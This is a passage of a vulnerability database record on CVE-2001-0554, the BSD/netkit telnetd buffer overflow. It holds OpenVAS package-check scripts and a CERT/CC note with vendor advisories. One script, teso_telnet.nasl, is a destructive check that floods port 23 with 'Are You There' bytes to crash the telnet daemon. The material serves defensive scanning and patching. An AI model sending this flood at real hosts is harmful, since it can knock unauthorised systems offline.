http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"ssltelnet\", ver:\"0.16.3-1.1\", rls:\"DEB2.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"telnet-ssl\", ver:\"0.16.3-1.1\", rls:\"DEB2.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"telnetd-ssl\", ver:\"0.16.3-1.1\", rls:\"DEB2.2\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:50:03", "bulletinFamily": "scanner", "cvelist": ["CVE-2001-0554"], "description": "The remote host is missing an update to netkit-telnet\nannounced via advisory DSA 070-1.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "id": "OPENVAS:53820", "href": "http://plugins.openvas.org/nasl.php?oid=53820", "type": "openvas", "title": "Debian Security Advisory DSA 070-1 (netkit-telnet)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_070_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 070-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The telnet daemon contained in the netkit-telnet_0.16-4potato1 package in\nthe 'stable' (potato) distribution of Debian GNU/Linux is vulnerable to an\nexploitable overflow in its output handling.\nThe original bug was found by <scut@nb.in-berlin.de>, and announced to\nbugtraq on Jul 18 2001. 
At that time, netkit-telnet versions after 0.14 were\nnot believed to be vulnerable.\nOn Aug 10 2001, zen-parse posted an advisory based on the same problem, for\nall netkit-telnet versions below 0.17.\nMore details can be found on http://www.securityfocus.com/archive/1/203000 .\nAs Debian uses the 'telnetd' user to run in.telnetd, this is not a remote\nroot compromise on Debian systems; the 'telnetd' user can be compromised.\n\nWe strongly advise you update your netkit-telnet packages to the versions\nlisted below.\";\ntag_summary = \"The remote host is missing an update to netkit-telnet\nannounced via advisory DSA 070-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20070-1\";\n\nif(description)\n{\n script_id(53820);\n script_cve_id(\"CVE-2001-0554\");\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 14:24:38 +0100 (Thu, 17 Jan 2008)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 070-1 (netkit-telnet)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"telnet\", ver:\"0.16-4potato.2\", rls:\"DEB2.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"telnetd\", ver:\"0.16-4potato.2\", rls:\"DEB2.2\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:10:06", "bulletinFamily": "scanner", "cvelist": ["CVE-2001-0554"], "description": "The Telnet server does not return an expected number of replies\nwhen it receives a long sequence of 'Are You There' commands.\nThis probably means it overflows one of its internal buffers and\ncrashes. It is likely an attacker could abuse this bug to gain\ncontrol over the remote host's superuser.\n\nFor more information, see:\nhttp://www.team-teso.net/advisories/teso-advisory-011.tar.gz", "modified": "2017-05-02T00:00:00", "published": "2005-11-03T00:00:00", "id": "OPENVAS:10709", "href": "http://plugins.openvas.org/nasl.php?oid=10709", "type": "openvas", "title": "TESO in.telnetd buffer overflow", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: teso_telnet.nasl 6056 2017-05-02 09:02:50Z teissa $\n# Description: TESO in.telnetd buffer overflow\n#\n# Authors:\n# Pavel Kankovsky, DCIT s.r.o. 
<kan@dcit.cz>\n#\n# Copyright:\n# Copyright (C) 2001 Pavel Kankovsky\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ntag_summary = \"The Telnet server does not return an expected number of replies\nwhen it receives a long sequence of 'Are You There' commands.\nThis probably means it overflows one of its internal buffers and\ncrashes. It is likely an attacker could abuse this bug to gain\ncontrol over the remote host's superuser.\n\nFor more information, see:\nhttp://www.team-teso.net/advisories/teso-advisory-011.tar.gz\";\n\ntag_solution = \"Comment out the 'telnet' line in /etc/inetd.conf.\";\n\n# The kudos for an idea of counting of AYT replies should go\n# to Sebastian <scut@nb.in-berlin.de> and Noam Rathaus\n# <noamr@beyondsecurity.com>.\n#\n# rd: tested against Solaris 2.8, RH Lx 6.2, FreeBSD 4.3 (patched & unpatched)\n\nif (description) {\n script_id(10709);\n script_version(\"$Revision: 6056 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-05-02 11:02:50 +0200 (Tue, 02 May 2017) $\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_xref(name:\"IAVA\", value:\"2001-t-0008\");\n script_bugtraq_id(3064);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2001-0554\");\n \n name = \"TESO 
in.telnetd buffer overflow\";\n script_name(name);\n \n\n summary = \"Attempts to overflow the Telnet server buffer\";\n\n \n script_category(ACT_DESTRUCTIVE_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n \n script_copyright(\"This script is Copyright (C) 2001 Pavel Kankovsky\");\n\n family = \"Gain a shell remotely\";\n script_family(family);\n\n # Must run AFTER ms_telnet_overflow-004.nasl\n script_dependencies(\"find_service.nasl\");\n\n script_require_ports(\"Services/telnet\", 23);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\n#\n# The script code starts here.\n#\ninclude('telnet_func.inc');\n\niac_ayt = raw_string(0xff, 0xf6);\niac_ao = raw_string(0xff, 0xf5);\niac_will_naol = raw_string(0xff, 0xfb, 0x08);\niac_will_encr = raw_string(0xff, 0xfb, 0x26);\n\n#\n# This helper function counts AYT responses in the input stream.\n# The input is read until 1. the expected number of responses is found,\n# or 2. EOF or read timeout occurs.\n#\n# At this moment, any occurrence of \"Yes\" or \"yes\" is supposed to be such\n# a response. Of course, this is wrong: some FreeBSD was observed to react\n# with \"load: 0.12 cmd: .log 20264 [running] 0.00u 0.00s 0% 620k\"\n# when the telnet negotiation have been completed. 
Unfortunately, adding\n# another pattern to this code would be too painful (hence the negotiation\n# tricks in attack()).\n#\n# In order to avoid an infinite loop (when testing a host that generates\n# lots of junk, intentionally or unintentionally), I stop when I have read\n# more than 100 * max bytes.\n#\n# Please note builtin functions like ereg() or egrep() cannot be used\n# here (easily) because they choke on '\\0' and many telnet servers send\n# this character\n#\n# Local variables: num, state, bytes, a, i, newstate\n#\n\nfunction count_ayt(sock, max) {\n num = 0; state = 0;\n bytes = 100 * max;\n while (bytes >= 0) {\n a = recv(socket:sock, length:1024);\n if (!a) return (num);\n bytes = bytes - strlen(a);\n for (i = 0; i < strlen(a); i = i + 1) {\n newstate = 0;\n if ((state == 0) && ((a[i] == \"y\") || (a[i] == \"Y\")))\n newstate = 1;\n if ((state == 1) && (a[i] == \"e\"))\n newstate = 2;\n if ((state == 2) && (a[i] == \"s\")) {\n # DEBUG display(\"hit \", a[i-2], a[i-1], a[i], \"\\n\");\n num = num + 1;\n if (num >= max) return (num);\n newstate = 0;\n }\n state = newstate;\n }\n }\n # inconclusive result\n return (-1);\n}\n\n#\n# This functions tests the vulnerability. \"negotiate\" indicates whether\n# full telnet negotiation should be performed using telnet_init().\n# Some targets might need it while others, like FreeBSD, fail to respond\n# to AYT in an expected way when the negotiation is done (cf. 
comments\n# accompanying count_ayt()).\n#\n# Local variables: r, total, size, bomb, succ\n#\n\nfunction attack(port, negotiate) {\n succ = 0;\n soc = open_sock_tcp(port);\n if (!soc) return (0);\n if (negotiate)\n # standard negotiation\n r = telnet_negotiate(socket:soc);\n else {\n # weird BSD magic, is is necessary?\n send(socket:soc, data:iac_will_naol);\n send(socket:soc, data:iac_will_encr);\n r = 1;\n }\n if (r) {\n # test whether the server talks to us at all\n # and whether AYT is supported\n send(socket:soc, data:iac_ayt);\n r = count_ayt(sock:soc, max:1);\n # DEBUG display(\"probe \", r, \"\\n\");\n if (r >= 1) { \n # test whether too many AYT's make the server die\n total = 2048; size = total * strlen(iac_ayt);\n bomb = iac_ao + crap(length:size, data:iac_ayt);\n send(socket:soc, data:bomb);\n r = count_ayt(sock:soc, max:total);\n # DEBUG\n#display(\"attack \", r, \" expected \", total, \"\\n\");\n if ((r >= 0) && (r < total)) succ = 1;\n }\n }\n close(soc);\n return (succ);\n}\n\n#\n# The main program.\n#\n\nport = get_kb_item(\"Services/telnet\");\nif (!port) port = 23;\n\nif (get_port_state(port)) {\n success = attack(port:port, negotiate:0);\n if (!success) success = attack(port:port, negotiate:1);\n if (success) security_message(port);\n}\n\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cert": [{"lastseen": "2020-09-18T20:45:13", "bulletinFamily": "info", "cvelist": ["CVE-2001-0554"], "description": "### Overview \n\nThe telnetd program is a server for the telnet remote virtual terminal protocol. There is a remotely exploitable buffer overflow in telnet daemons derived from BSD source code. This vulnerability can crash the server, or be leveraged to gain root access.\n\n### Description \n\nThere is a remotely exploitable buffer overflow in telnet daemons derived from BSD source code. The buffer overflow occurs in the server's processing of protocol options. 
A function of the telnet daemon, 'telrcv', processes the protocol options. During the processing of the options, the results of 'telrcv' are assumed to be smaller than an unchecked storage buffer. The size of this buffer is statically defined.\n\nTESO claims that they have a working exploit for the BSDI, FreeBSD, and NetBSD versions affected(see <http://www.team-teso.net/advisories/teso-advisory-011.tar.gz>). Their exploit has been publicly posted on the BugTraq mailing list. We have verified the exploit works against at least one target system. \n \nAccording to a TESO advisory, the following systems with telnetd running are vulnerable to the buffer overflow: \n \n\\- BSDI 4.x default \n\\- FreeBSD [2345].x default \n\\- IRIX 6.5 \n\\- Linux netkit-telnetd version 0.14 and earlier \n\\- NetBSD 1.x default \n\\- OpenBSD 2.x \n\\- Solaris 2.x sparc \n \nTESO indicates that other vendor's telnet daemons have a high probability of being vulnerable as well. FreeBSD has confirmed the following releases are vulnerable: \n \n_\"All releases of FreeBSD 3.x, 4.x prior to 4.4, FreeBSD 4.3-STABLE prior to the correction date.\"_ \n \n--- \n \n### Impact \n\nAn intruder can execute arbitrary code as the user running telnetd, typically root. \n \n--- \n \n### Solution \n\nInstall a patch from your vendor when available. Please continue to check this document for information available from the CERT/CC. \n \n--- \n \nDisallow access to the telnet service (typically port 23/tcp) using firewall or packet-filtering technology. Blocking access to the telnet service will limit your exposure to attacks from outside your network perimeter. However, blocking port 23/tcp at a network perimeter would still allow any users, remote or local, within the perimeter of your network to exploit the vulnerability. It is important to understand your network's configuration and service requirements prior to deciding what changes are appropriate. 
\n \n--- \n \n### Vendor Information\n\n745371\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Apple __ Affected\n\nNotified: July 24, 2001 Updated: October 04, 2001 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\n<http://www.apple.com/support/security/security_updates.html>\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23745371 Feedback>).\n\n### BSDI __ Affected\n\nNotified: July 23, 2001 Updated: August 15, 2001 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nAll current versions of BSD/OS are vulnerable. Patches will be available via our web site at <http://www.bsdi.com/services/support/patches> and via ftp at <ftp://ftp.bsdi.com/bsdi/support/patches> as soon as testing has been completed.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23745371 Feedback>).\n\n### Caldera __ Affected\n\nNotified: July 24, 2001 Updated: August 20, 2001 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nCaldera has determined that OpenServer, UnixWare 7 and OpenUnix 8 are vulnerable, and we are working on fixes. All of Caldera's Linux supported products are unaffected by this problem if all previously released security updates have been applied. 
If you're running either OpenLinux 2.3 or OpenLinux eServer 2.3, make sure you've updated your systems to netkit-telnet-0.16. This patch was released in March 2000, and are available from <ftp://ftp.caldera.com>\n\nOpenLinux 2.3:\n\n/pub/openlinux/updates/2.3/022/RPMS/netkit-telnet-0.16-1.i386.rpm\n\nOpenLinux eServer 2.3.1:\n\n/pub/eServer/2.3/updates/2.3/007/RPMS/netkit-telnet-0.16-1.i386.rpm \n\nOpenLinux eDesktop 2.4, OpenLinux 3.1 Server, and OpenLinux 3.1 Workstation are not affected. \n \n--- \n \n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nCaldera has recently released [CSSA-2001-030.0](<http://www.caldera.com/support/security/advisories/CSSA-2001-030.0.txt>) which indicates that the following systems are indeed vulnerable: \n \nAll packages previous to netkit-telnet-0.17-12a on \n \n\\- OpenLinux 2.3 \n\\- OpenLinux eServer 2.3.1 and OpenLinux eBuilder \n\\- OpenLinux eDesktop 2.4 \n\\- OpenLinux Server 3.1 \n\\- OpenLinux Workstation 3.1\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23745371 Feedback>).\n\n### Cisco __ Affected\n\nNotified: July 24, 2001 Updated: February 01, 2002 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\n`-----BEGIN PGP SIGNED MESSAGE----- \n`\n\n`Cisco Security Advisory: Cisco CatOS Telnet Buffer Vulnerability \n================================================================ \n` \n`Revision 1.0 \n` \n`For Public Release 2002 January 29 at 1500 UTC \n` \n`- ------------------------------------------------------------------------------- \n` \n`Summary \n- ------- \nSome Cisco Catalyst switches, running certain CatOS based software releases, \nhave a vulnerability wherein a buffer overflow in the telnet option handling \ncan cause the telnet daemon to crash and result in a switch reload. 
This \nvulnerability can be exploited to initiate a denial of service (DoS) attack. \n` \n`This vulnerability is documented as Cisco bug ID CSCdw19195. There are \nworkarounds available to mitigate the vulnerability. \n` \n`This advisory will be posted at ``<http://www.cisco.com/warp/public/707/>`` \ncatos-telrcv-vuln-pub.shtml . \n` \n`Affected Products \n- ----------------- \nCisco's various Catalyst family of switches run CatOS-based releases or \nIOS-based releases. IOS-based releases are not vulnerable. \n` \n`The following Cisco Catalyst Switches are vulnerable : \n` \n` * Catalyst 6000 series \n* Catalyst 5000 series \n* Catalyst 4000 series \n* Catalyst 2948G \n* Catalyst 2900 \n` \n`For the switches above, the following CatOS based switch software revisions are \nvulnerable. \n` \n`+-----------------------------------------------------------------------------+ \n| | Release 4 | Release 5 | Release 6 | Release 7 | \n| | code base | code base | code base | code base | \n|---------------+---------------+---------------+--------------+--------------| \n| Catalyst 6000 | Not | earlier than | earlier than | earlier than | \n| series | Applicable | 5.5(13) | 6.3(4) | 7.1(2) | \n|---------------+---------------+---------------+--------------+--------------| \n| Catalyst 5000 | earlier than | earlier than | earlier than | Not | \n| series | 4.5(13a) | 5.5(13) | 6.3(4) | Applicable | \n|---------------+---------------+---------------+--------------+--------------| \n| Catalyst 4000 | All releases | earlier than | earlier than | earlier than | \n| series | | 5.5(13) | 6.3(4) | 7.1(2) | \n+-----------------------------------------------------------------------------+ \n` \n`To determine your software revision, type show version at the command line \nprompt. 
\n` \n`Not Affected Products \n- --------------------- \nThe following Cisco Catalyst Switches are not vulnerable : \n` \n` * Catalyst 8500 series \n* Catalyst 4800 series \n* Catalyst 4200 series \n* Catalyst 3900 series \n* Catalyst 3550 series \n* Catalyst 3500 XL series \n* Catalyst 4840G \n* Catalyst 4908G-l3 \n* Catalyst 2948G-l3 \n* Catalyst 2950 \n* Catalyst 2900 XL \n* Catalyst 2900 LRE XL \n* Catalyst 2820 \n* Catalyst 1900 \n` \n`No other Cisco product is currently known to be affected by this vulnerability. \n` \n`Details \n- ------- \nSome Cisco Catalyst switches, running certain CatOS-based software releases, \nhave a vulnerability wherein a buffer overflow in the telnet option handling \ncan cause the telnet daemon to crash and result in a switch reload. This \nvulnerability can be exploited to initiate a denial of service (DoS) attack. \nOnce the switch has reloaded, it is still vulnerable and the attack can be \nrepeated as long as the switch is IP reachable on port 23 and has not been \nupgraded to a fixed version of CatOS switch software. \n` \n`This vulnerability is documented as Cisco bug ID CSCdw19195, which requires a \nCCO account to view and can be viewed after 2002 January 30 at 1500 UTC. \n` \n`Impact \n- ------ \nThis vulnerability can be exploited to produce a denial of service (DoS) \nattack. When the vulnerability is exploited it can cause the Cisco Catalyst \nswitch to crash and reload. \n` \n`Software Versions and Fixes \n- --------------------------- \nThis vulnerability has been fixed in the following switch software revisions \nand the fix will be carried forward in all future releases. 
\n` \n`+-------------------------------------------------------------------------------+ \n| | Release 4 | Release 5 | Release 6 | Release 7 | \n| | code base | code base | code base | code base | \n|---------------+---------------+---------------+---------------+---------------| \n| Catalyst 6000 | Not | 5.5(13) and | 6.3(4) and | 7.1(2) and | \n| series | Applicable | later | later | later | \n|---------------+---------------+---------------+---------------+---------------| \n| Catalyst 5000 | 4.5(13a) | 5.5(13) and | 6.3(4) and | Not | \n| series | | later | later | Applicable | \n|---------------+---------------+---------------+---------------+---------------| \n| Catalyst 4000 | Not Available | 5.5(13) and | 6.3(4) and | 7.1(2) and | \n| series | | later | later | later | \n+-------------------------------------------------------------------------------+ \n` \n`All previous releases must upgrade to the above releases. CatOS switch software \nrelease 4.5(13a) for the Catalyst 5000 series is expected on CCO by 2002 \nFebruary 4. CatOS switch software release 7.1(2) is expected on CCO by 2002 \nFebruary 4. \n` \n`Software upgrade can be performed via the console interface. Please refer to \nsoftware release notes for instructions. \n` \n`Obtaining Fixed Software \n- ------------------------ \nCisco is offering free software upgrades to remedy this vulnerability for all \naffected customers. Customers with service contracts may upgrade to any \nsoftware release containing the feature sets they have purchased. \n` \n`Customers with contracts should obtain upgraded software through their regular \nupdate channels. For most customers, this means that upgrades should be \nobtained through the Software Center on Cisco's Worldwide Web site at http:// \nwww.cisco.com . 
\n` \n`Customers whose Cisco products are provided or maintained through prior or \nexisting agreement with third-party support organizations such as Cisco \nPartners, authorized resellers, or service providers should contact that \nsupport organization for assistance with the upgrade, which should be free of \ncharge. \n` \n`Customers who purchased directly from Cisco but who do not hold a Cisco service \ncontract, and customers who purchase through third party vendors but are \nunsuccessful at obtaining fixed software through their point of sale, should \nget their upgrades by contacting the Cisco Technical Assistance Center (TAC). \nTAC contacts are as follows: \n` \n` * +1 800 553 2447 (toll free from within North America) \n* +1 408 526 7209 (toll call from anywhere in the world) \n* e-mail: tac@cisco.com \n` \n`See ``<http://www.cisco.com/warp/public/687/Directory.shtml>`` for additional TAC \ncontact information, including instructions and e-mail addresses for use in \nvarious languages. \n` \n`Please have your product serial number available and give the URL of this \nnotice as evidence of your entitlement to a free upgrade. Free upgrades for non \ncontract customers must be requested through the TAC. \n` \n`Please do not contact either \"psirt@cisco.com\" or \"security-alert@cisco.com\" \nfor software upgrades. \n` \n`Workarounds \n- ----------- \nThe following workarounds can be implemented. \n` \n` * If ssh is available in the code base use ssh instead of Telnet and disable \nTelnet. \n` \n` For instructions how to do this please refer ``<http://www.cisco.com/warp/>`` \npublic/707/ssh_cat_switches.html \n` \n` * Apply Access Control Lists (ACLs) on routers / switches / firewalls in \nfront of the vulnerable switches such that traffic destined for the Telnet \nport 23 on the vulnerable switches is only allowed from the network \nmanagement subnets. 
\n` \n` For an example see ``<http://www.cisco.com/univercd/cc/td/doc/product/lan/>`` \ncat6000/sw_5_4/msfc/acc_list.htm \n` \n`Exploitation and Public Announcements \n- ------------------------------------- \nThis vulnerability has been exploited to initiate Denial of Service (DoS) \nattacks. \n` \n`This vulnerability was reported by TESO and is detailed at ``<http://www.cert.org/>`` \nadvisories/CA-2001-21.html \n` \n`Status of This Notice: Final \n- ---------------------------- \nThis is a final notice. Although Cisco cannot guarantee the accuracy of all \nstatements in this notice, all of the facts have been checked to the best of \nour ability. Cisco does not anticipate issuing updated versions of this notice \nunless there is some material change in the facts. Should there be a \nsignificant change in the facts, Cisco may update this notice. \n` \n`A standalone copy or paraphrase of the text of this security advisory that \nomits the distribution URL in the following section is an uncontrolled copy, \nand may lack important information or contain factual errors. \n` \n`Distribution \n- ------------ \nThis notice will be posted on Cisco's Worldwide Web site at http:// \nwww.cisco.com/warp/public/707/catos-telrcv-vuln-pub.shtml . \n` \n`In addition to Worldwide Web posting, a text version of this notice is \nclear-signed with the Cisco PSIRT PGP key and is posted to the following e-mail \nand Usenet news recipients: \n` \n` * cust-security-announce@cisco.com \n* bugtraq@securityfocus.com \n* firewalls@lists.gnac.com \n* first-teams@first.org (includes CERT/CC) \n* cisco@spot.colorado.edu \n* cisco-nsp@puck.nether.net \n* comp.dcom.sys.cisco \n* Various internal Cisco mailing lists \n` \n`Future updates of this notice, if any, will be placed on Cisco's Worldwide Web \nserver, but may or may not be actively announced on mailing lists or \nnewsgroups. Users concerned about this problem are encouraged to check the \nabove URL for any updates. 
\n` \n`Revision History \n- ---------------- \n+-----------------------------------------------------------------------------+ \n| Revision 1.0 | 2002-Jan-29 | For Public Release 2002 January 29 at 1500 UTC | \n+-----------------------------------------------------------------------------+ \n` \n`Cisco Security Procedures \n- ------------------------- \nComplete information on reporting security vulnerabilities in Cisco products, \nobtaining assistance with security incidents, and registering to receive \nsecurity information from Cisco, is available on Cisco's Worldwide Web site at \n``<http://www.cisco.com/go/psirt>`` . This includes instructions for press inquiries \nregarding Cisco security notices. \n- ------------------------------------------------------------------------------- \nThis notice is copyright 2002 by Cisco Systems, Inc. This notice may be \nredistributed freely after the release date given at the top of the text, \nprovided that redistributed copies are complete and unmodified, including all \ndate and version information. 
\n- ------------------------------------------------------------------------------- \n` \n`-----BEGIN PGP SIGNATURE----- \nVersion: PGP 6.5.8 \nComment: Signed by Sharad Ahlawat, Cisco Systems PSIRT \n` \n`iQEVAwUBPFa4iw/VLJ+budTTAQGkywf9GkyUO77MFWJHqhGR+ZtNpk63NAzK4ath \nTGE/GyRJlht4YXvP4sTuKgRmsBkefXRoFttN0T8G1HytxTfFP75THbh5kk2kRFYo \nR4qcxM6QExs1FbJwx42MOjmD5Cyds8pdZ8ZSGdVTDe96k/0D+BNiN1oe672x1hkM \n6Nrt1wnyRzKj7ZfF7NRnlN7DsR4gAPIIP0yLiP2KLJheqDnZNThANng97i9YP1Mz \ngve9jAwZtiKij6mv0LDG/Jkk/NUl5VijxfuoRFM4ZvAEn8hFYDLnvPJUVb+CvKpt \n3AJ3/J+MBS8EAKTM98sGr5ywp7/cQfXWZsoJAYgHbGtEs3Qy6xbK+w== \n=1bxQ \n-----END PGP SIGNATURE-----`.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23745371 Feedback>).\n\n### Conectiva __ Affected\n\nUpdated: August 27, 2001 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\n`-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1 \n`\n\n`- -------------------------------------------------------------------------- \nCONECTIVA LINUX SECURITY ANNOUNCEMENT \n- -------------------------------------------------------------------------- \n` \n`PACKAGE : telnet \nSUMMARY : Remote root vulnerability \nDATE : 2001-08-24 15:43:00 \nID : CLA-2001:413 \nRELEVANT \nRELEASES : 4.0, 4.0es, 4.1, 4.2, 5.0, prg graficos, ecommerce, 5.1, 6.0, 7.0 \n` \n`- ------------------------------------------------------------------------- \n` \n`DESCRIPTION \nThe TESO crew reported on Bugtraq a vulnerability affecting the \ntelnet server which can be used by remote attackers to obtain root \nprivileges. 
Initially it was thought that the netkit-telnet package, \nused by most linux distributions, was not vulnerable starting with \nversion 0.14, but zen-parse showed later on that those versions, \nincluding the 0.17 one, are also vulnerable. \n` \n \n`SOLUTION \nWe recommend that all users currently using telnet start using \nopenssh instead or some other form of encrypted communication. \nUsers who cannot switch to openssh now should upgrade the telnet \npackage immediately. Please note that no restart is necessary after \nthe upgrade, since telnet is started on demand by inetd. \n` \n \n` REFERENCES: \n1. ``<http://www.securityfocus.com/bid/3064>`` \n` \n \n`DIRECT DOWNLOAD LINKS TO THE UPDATED PACKAGES \n``<ftp://atualizacoes.conectiva.com.br/4.0/SRPMS/telnet-0.17-1U40_1cl.src.rpm>`` \n``<ftp://atualizacoes.conectiva.com.br/4.0/i386/telnet-0.17-1U40_1cl.i386.rpm>`` \n``<ftp://atualizacoes.conectiva.com.br/4.0es/SRPMS/telnet-0.17-1U40_1cl.src.rpm>`` \n``<ftp://atualizacoes.conectiva.com.br/4.0es/i386/telnet-0.17-1U40_1cl.i386.rpm>`` \n``<ftp://atualizacoes.conectiva.com.br/4.1/SRPMS/telnet-0.17-1U41_1cl.src.rpm>`` \n``<ftp://atualizacoes.conectiva.com.br/4.1/i386/telnet-0.17-1U41_1cl.i386.rpm>`` \n``<ftp://atualizacoes.conectiva.com.br/4.2/SRPMS/telnet-0.17-1U42_1cl.src.rpm>`` \n``<ftp://atualizacoes.conectiva.com.br/4.2/i386/telnet-0.17-1U42_1cl.i386.rpm>`` \n``<ftp://atualizacoes.conectiva.com.br/5.0/SRPMS/telnet-0.17-1U50_1cl.src.rpm>`` \n``<ftp://atualizacoes.conectiva.com.br/5.0/i386/telnet-0.17-1U50_1cl.i386.rpm>`` \n``<ftp://atualizacoes.conectiva.com.br/5.0/i386/telnet-server-0.17-1U50_1cl.i386.rpm>`` \n``<ftp://atualizacoes.conectiva.com.br/5.1/SRPMS/telnet-0.17-1U51_1cl.src.rpm>`` \n``<ftp://atualizacoes.conectiva.com.br/5.1/i386/telnet-server-0.17-1U51_1cl.i386.rpm>`` \n``<ftp://atualizacoes.conectiva.com.br/5.1/i386/telnet-0.17-1U51_1cl.i386.rpm>`` \n``<ftp://atualizacoes.conectiva.com.br/6.0/SRPMS/telnet-0.17-2U60_1cl.src.rpm>`` 
